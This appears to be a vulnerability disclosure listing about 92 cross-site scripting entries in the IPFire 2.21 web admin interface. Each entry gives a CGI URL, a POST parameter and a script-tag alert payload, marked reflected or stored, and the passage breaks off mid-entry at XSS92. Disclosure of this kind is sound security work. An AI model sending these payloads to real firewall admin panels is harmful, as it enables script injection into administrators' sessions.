2648 lines
No EOL
38 KiB
Text
2648 lines
No EOL
38 KiB
Text
##################################################################################################################################
|
|
# Exploit Title: IPFire 2.21 - Core Update 127 | Cross-Site Scripting
|
|
# Date: 08.02.2019
|
|
# Exploit Author: Ozer Goker
|
|
# Vendor Homepage: https://www.ipfire.org
|
|
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso
|
|
# Version: IPFire 2.21 - Core Update 127
|
|
##################################################################################################################################
|
|
|
|
Introduction
|
|
IPFire is a Linux distribution that focusses on easy setup, good handling
|
|
and high level of security. It is operated via an intuitive web-based
|
|
interface which offers many configuration options for beginning and
|
|
experienced system administrators. IPFire is maintained by developers who
|
|
are concerned about security and who update the product regularly to keep
|
|
it secure. IPFire ships with a custom package manager called Pakfire and
|
|
the system can be expanded with various add-ons.
|
|
|
|
|
|
#################################################################################
|
|
|
|
XSS details: Reflected & Stored
|
|
|
|
#################################################################################
|
|
|
|
XSS1 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mail.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
txt_mailsender
|
|
|
|
PAYLOAD
|
|
'"><script>alert(1)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS2 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mail.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
txt_recipient
|
|
|
|
PAYLOAD
|
|
'><script>alert(2)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS3 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mail.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
txt_mailserver
|
|
|
|
PAYLOAD
|
|
'><script>alert(3)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS4 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mail.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
txt_mailport
|
|
|
|
PAYLOAD
|
|
'><script>alert(4)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS5 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mail.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
txt_mailuser
|
|
|
|
PAYLOAD
|
|
'><script>alert(5)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS6 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mail.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
txt_mailpass
|
|
|
|
PAYLOAD
|
|
'><script>alert(6)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS7 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
PROXY_PORT
|
|
|
|
PAYLOAD
|
|
'><script>alert(7)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS8 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
TRANSPARENT_PORT
|
|
|
|
PAYLOAD
|
|
'><script>alert(8)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS9 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
UPSTREAM_PROXY
|
|
|
|
PAYLOAD
|
|
'><script>alert(9)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS10 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
UPSTREAM_USER
|
|
|
|
PAYLOAD
|
|
'><script>alert(10)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS11 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
UPSTREAM_PASSWORD
|
|
|
|
PAYLOAD
|
|
'><script>alert(11)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS12 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FILEDESCRIPTORS
|
|
|
|
PAYLOAD
|
|
'><script>alert(12)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS13 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
CACHE_MEM
|
|
|
|
PAYLOAD
|
|
'><script>alert(13)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS14 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
CACHE_SIZE
|
|
|
|
PAYLOAD
|
|
'><script>alert(14)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS15 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MIN_SIZE
|
|
|
|
PAYLOAD
|
|
'><script>alert(15)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS16 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAX_SIZE
|
|
|
|
PAYLOAD
|
|
'><script>alert(16)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS17 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAX_INCOMING_SIZE
|
|
|
|
PAYLOAD
|
|
'><script>alert(17)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS18 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAX_OUTGOING_SIZE
|
|
|
|
PAYLOAD
|
|
'><script>alert(18)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS19 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
AUTH_CHILDREN
|
|
|
|
PAYLOAD
|
|
'><script>alert(19)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS20 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
AUTH_CACHE_TTL
|
|
|
|
PAYLOAD
|
|
'><script>alert(20)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS21 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
AUTH_ALWAYS_REQUIRED
|
|
|
|
PAYLOAD
|
|
'><script>alert(21)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS22 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DST_NOAUTH
|
|
|
|
PAYLOAD
|
|
'><script>alert(22)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS23 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NCSA_MIN_PASS_LEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(23)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS24 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NCSA_BYPASS_REDIR
|
|
|
|
PAYLOAD
|
|
'><script>alert(24)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS25 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IDENT_REQUIRED
|
|
|
|
PAYLOAD
|
|
'><script>alert(25)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS26 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IDENT_TIMEOUT
|
|
|
|
PAYLOAD
|
|
'><script>alert(26)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS27 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IDENT_HOSTS
|
|
|
|
PAYLOAD
|
|
'><script>alert(27)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS28 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IDENT_ENABLE_ACL
|
|
|
|
PAYLOAD
|
|
'><script>alert(28)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS29 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IDENT_USER_ACL
|
|
|
|
PAYLOAD
|
|
'><script>alert(29)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS30 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IDENT_ALLOW_USERS
|
|
|
|
PAYLOAD
|
|
'><script>alert(30)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS31 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IDENT_DENY_USERS
|
|
|
|
PAYLOAD
|
|
'><script>alert(31)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS32 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
LDAP_TYPE
|
|
|
|
PAYLOAD
|
|
'><script>alert(32)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS33 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
LDAP_PORT
|
|
|
|
PAYLOAD
|
|
'><script>alert(33)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS34 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
RADIUS_PORT
|
|
|
|
PAYLOAD
|
|
'><script>alert(34)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS35 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
RADIUS_ENABLE_ACL
|
|
|
|
PAYLOAD
|
|
'><script>alert(35)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS36 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
RADIUS_USER_ACL
|
|
|
|
PAYLOAD
|
|
'><script>alert(36)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS37 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
RADIUS_ALLOW_USERS
|
|
|
|
PAYLOAD
|
|
'><script>alert(37)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS38 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/proxy.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
RADIUS_DENY_USERS
|
|
|
|
PAYLOAD
|
|
'><script>alert(38)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS39 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/urlfilter.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
REDIRECT_PAGE
|
|
|
|
PAYLOAD
|
|
'><script>alert(39)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS40 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/urlfilter.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
BE_BLACKLIST
|
|
|
|
PAYLOAD
|
|
'><script>alert(40)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS41 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/updatexlrator.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAX_DISK_USAGE
|
|
|
|
PAYLOAD
|
|
'><script>alert(41)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS42 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/updatexlrator.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAX_DOWNLOAD_RATE
|
|
|
|
PAYLOAD
|
|
'><script>alert(42)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS43 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
START_ADDR_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(43)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS44 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
END_ADDR_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(44)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS45 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DEFAULT_LEASE_TIME_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(45)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS46 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAX_LEASE_TIME_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(46)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS47 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DOMAIN_NAME_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(47)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS48 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DNS1_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(48)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS49 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DNS2_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(49)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS50 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NTP1_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(50)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS51 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NTP2_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(51)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS52 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
WINS1_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(52)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS53 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
WINS2_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(53)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS54 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NEXT_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(54)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS55 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FILE_GREEN
|
|
|
|
PAYLOAD
|
|
'><script>alert(55)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS56 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ADVOPT_DATA
|
|
|
|
PAYLOAD
|
|
'><script>alert(56)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS57 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
KEY1
|
|
|
|
PAYLOAD
|
|
'><script>alert(57)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS58 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FIX_MAC
|
|
|
|
PAYLOAD
|
|
'><script>alert(58)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS59 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FIX_ADDR
|
|
|
|
PAYLOAD
|
|
'><script>alert(59)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS60 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FIX_REMARK
|
|
|
|
PAYLOAD
|
|
'><script>alert(60)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS61 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FIX_NEXTADDR
|
|
|
|
PAYLOAD
|
|
'><script>alert(61)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS62 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FIX_FILENAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(62)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS63 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FIX_ROOTPATH
|
|
|
|
PAYLOAD
|
|
'><script>alert(63)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS64 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dhcp.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
KEY2
|
|
|
|
PAYLOAD
|
|
'><script>alert(64)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS65 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/captive.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
TITLE
|
|
|
|
PAYLOAD
|
|
"><script>alert(65)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS66 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/captive.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
COLOR
|
|
|
|
PAYLOAD
|
|
"><script>alert(66)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS67 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/connscheduler.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ACTION_HOUR
|
|
|
|
PAYLOAD
|
|
<script>alert(67)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS68 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/connscheduler.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ACTION_MINUTE
|
|
|
|
PAYLOAD
|
|
<script>alert(68)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS69 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/connscheduler.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ACTION_DAYSTART
|
|
|
|
PAYLOAD
|
|
<script>alert(69)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS70 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/connscheduler.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ACTION_DAYEND
|
|
|
|
PAYLOAD
|
|
<script>alert(70)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS71 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/hosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
KEY1
|
|
|
|
PAYLOAD
|
|
'><script>alert(71)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS72 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/hosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IP
|
|
|
|
PAYLOAD
|
|
'><script>alert(72)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS73 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/hosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
HOST
|
|
|
|
PAYLOAD
|
|
'><script>alert(73)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS74 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/hosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DOM
|
|
|
|
PAYLOAD
|
|
'><script>alert(74)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS75 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dns.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DNS0
|
|
|
|
PAYLOAD
|
|
"><script>alert(75)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS76 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dns.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DNS1
|
|
|
|
PAYLOAD
|
|
"><script>alert(76)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS77 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dnsforward.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ZONE
|
|
|
|
PAYLOAD
|
|
"><script>alert(77)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS78 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/dnsforward.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FORWARD_SERVERS
|
|
|
|
PAYLOAD
|
|
'><script>alert(78)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS79 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/routing.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
KEY1
|
|
|
|
PAYLOAD
|
|
'><script>alert(79)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS80 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/routing.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
GATEWAY
|
|
|
|
PAYLOAD
|
|
'><script>alert(80)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS81 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/routing.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
REMARK
|
|
|
|
PAYLOAD
|
|
'><script>alert(81)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS82 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mac.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAC
|
|
|
|
PAYLOAD
|
|
'><script>alert(82)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS83 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mac.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAC1
|
|
|
|
PAYLOAD
|
|
'><script>alert(83)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS84 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/mac.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
MAC2
|
|
|
|
PAYLOAD
|
|
'><script>alert(84)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS85 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/wakeonlan.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
CLIENT_MAC
|
|
|
|
PAYLOAD
|
|
'><script>alert(85)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS86 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/wakeonlan.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
CLIENT_COMMENT
|
|
|
|
PAYLOAD
|
|
'><script>alert(86)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS87 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
TYPE
|
|
|
|
PAYLOAD
|
|
'><script>alert(87)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS88 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IKE_VERSION
|
|
|
|
PAYLOAD
|
|
'><script>alert(88)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS89 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IKE_ENCRYPTION
|
|
|
|
PAYLOAD
|
|
'><script>alert(89)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS90 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IKE_INTEGRITY
|
|
|
|
PAYLOAD
|
|
'><script>alert(90)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS91 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IKE_GROUPTYPE
|
|
|
|
PAYLOAD
|
|
'><script>alert(91)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS92 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
